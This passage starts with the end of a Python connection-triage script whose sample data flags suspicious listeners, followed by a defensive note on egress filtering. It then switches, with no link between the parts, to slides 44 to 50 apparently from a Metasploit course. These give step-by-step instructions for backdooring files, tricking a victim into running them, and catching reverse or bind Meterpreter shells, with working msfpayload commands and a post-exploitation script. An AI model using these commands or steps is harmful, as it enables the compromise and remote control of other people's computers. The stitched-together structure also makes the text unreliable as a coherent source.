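    Conn(776, "svchost.exe", "LISTEN", 135),
    Conn(2210, "chrome.exe", "ESTABLISHED", 49800, "203.0.113.10", 443),
    Conn(912, "explorer.exe", "ESTABLISHED", 49712, "192.168.100.15", 4444),
    Conn(1340, "bind.exe", "LISTEN", 666),
    Conn(3001, "nfs.exe", "ESTABLISHED", 49900, "192.168.100.1", 443),
]

if __name__ == "__main__":
    for pid, proc, reason in triage(SAMPLE):
        print(f"pid={pid:<5} {proc:<13} {reason}")
```

Port-based matching only catches the lab defaults; the process allow-list is what catches the session after it has migrated into explorer.exe or reconnected on 443 via the persistence script, and egress filtering on the firewall closes the gap the table describes.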
  • 44. Meterpreter Reverse Shell Access: Steps Involved
    Step 1: Backdoor file. Backdoor a file and infect it with exploit code and payload (exe, pdf, doc, xls).
    Step 2: Listener. Launch a listener on your computer.
    Step 3: Exploitation. Send the infected file to the victim and somehow make them execute it.
    Step 4: Shell Access. Wait for the remote shell connection to be established between victim and attacker.
    Step 5: Post Exploitation. Control the victim's computer with post-exploitation scripts.
  • 45. Meterpreter Bind Shell Access: Steps Involved
    Step 1: Backdoor file. Backdoor a file and infect it with exploit code and payload (exe, pdf, doc, xls).
    Step 2: Exploitation. Send the infected file to the victim and somehow make them execute it.
    Step 3: Listener. The exploit binds itself to a particular port on the victim and listens for a connection from the attacker.
    Step 4: Shell Access. The attacker connects to the victim on the exploited port.
    Step 5: Post Exploitation. Control the victim's computer with post-exploitation scripts and commands.
  • 46. MSFPAYLOAD: msfpayload -l displays a list of payloads that can be used to backdoor a file.
  • 47. MSFPAYLOAD: It is possible to create payloads for both reverse and bind shell attacks.
  • 48. Backdooring an EXE file with a payload
    It is possible to backdoor an EXE file with a payload (reverse or bind shell) with the help of msfpayload: msfpayload <payload> <LHOST=> <LPORT=> X -o <output file name>
    For example: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.100.12 LPORT=4444 X >/root/desktop/NFS.exe
  • 49. Create Bind Shell: msfpayload windows/meterpreter/bind_tcp LHOST=192.168.100.13 LPORT=666 X >/root/desktop/bind.exe
  • 50. Meterpreter existing script: Get shortcuts from the victim: run post/windows/gather/dumplinks